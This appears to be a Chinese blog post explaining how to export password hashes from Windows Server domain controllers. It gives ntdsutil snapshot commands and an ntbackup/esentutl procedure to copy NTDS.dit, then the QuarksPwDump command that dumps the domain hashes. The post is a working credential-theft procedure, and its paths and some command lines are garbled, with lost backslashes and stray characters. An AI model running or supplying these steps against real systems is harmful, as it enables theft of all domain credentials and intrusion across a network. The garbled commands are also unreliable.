• windows 2003 windows 2008 windows 2012 导出域控hash的方法


    quarkspwdump作者介绍的用法:

    1. Windows 2008
       
      Microsoft recently implements VSS (Volume Shadow Copy Service) which allow an administrator to make
      filesystem snapshots while the operating is running and writing to current backuped files.
       
      Here is a way to backup NTDS.dit file while a domain controller is running:
       
      #ntdsutil
      #snapshot
      #activate instance ntds
      #create
      #mount {GUID}
      #copy c:MOUNT_POINTWINDOWSNTDSNTDS.dit c:NTDS_saved.dit
      #unmount {GUID}
      #quit
      #quit
       
      If AD server hasn't the "AD DS role", you have to use dsdbutil.exe command in the same way.
       
       
       
     2. Windows 2003  
      On this version, VSS has been implemented but not NTDS-type snapshots.
      But you can use ntbackup tool, here is the procedure:
       
      - Launch NTBACKUP gui
      - Use backup wizard (advanced)
      - Choose to save system state only and choose output filename
      - Wait some minutes
      - Use restore wizard (advanced)
      - Choise your backup, click next and use advanced button
      - Choose to restore file on another location (c: mp for example)
      - Choose to overwrite everything and next uncheck all restoration parameters
      - Validate and wait some minutes
      - Open a command shell to "c: mpActive Directory"
      - We need to repair the database with this command
      #esentutl /p ntds.dit
      - Validate warning and wait some minutes
       
      ntds.dit file can now be used with quarkspwdump.

    其中

    #ntdsutil
    #snapshot
    #activate instance ntds
    #create
    #mount {GUID}
    #copy c:MOUNT_POINTWINDOWSNTDSNTDS.dit c:NTDS_saved.dit
    #unmount {GUID}
    #quit
    #quit

    适用于可交互式或直接登录状态。

    如果是半交互式的,可以采用如下方法(网上看到的用法):

    ntdsutil  snapshot  "activate  instance  ntds"  create  quit  quit
    ntdsutil  snapshot  "mount {GUID}"  quit  quit
    copy  MOUNT_POINTwindowsNTDS
    tds.dit  c:
    tds.dit
    ntdsutil  snapshot  "unmount {GUID}"  quit  quit2 v- p5 I2 O  E
    ntdsutil  snapshot  "delete {GUID}"  quit  quit

    最后

    QuarksPwDump.exe --dump-hash-domain --ntds-file c:
    tds.dit
    不要因为走了太久而忘记当初为什么出发
  • 相关阅读:
    Java_多线程入门
    JAVA多线程基础(一)
    多线程1
    1.优化MySQL数据库
    廖胤松
    Mybatais
    Spring Boot入门
    MySQL的安装步骤详解
    MySQL入门
    WEB测试方法
  • 原文地址:https://www.cnblogs.com/landuo11/p/7492458.html
Copyright © 2020-2023  润新知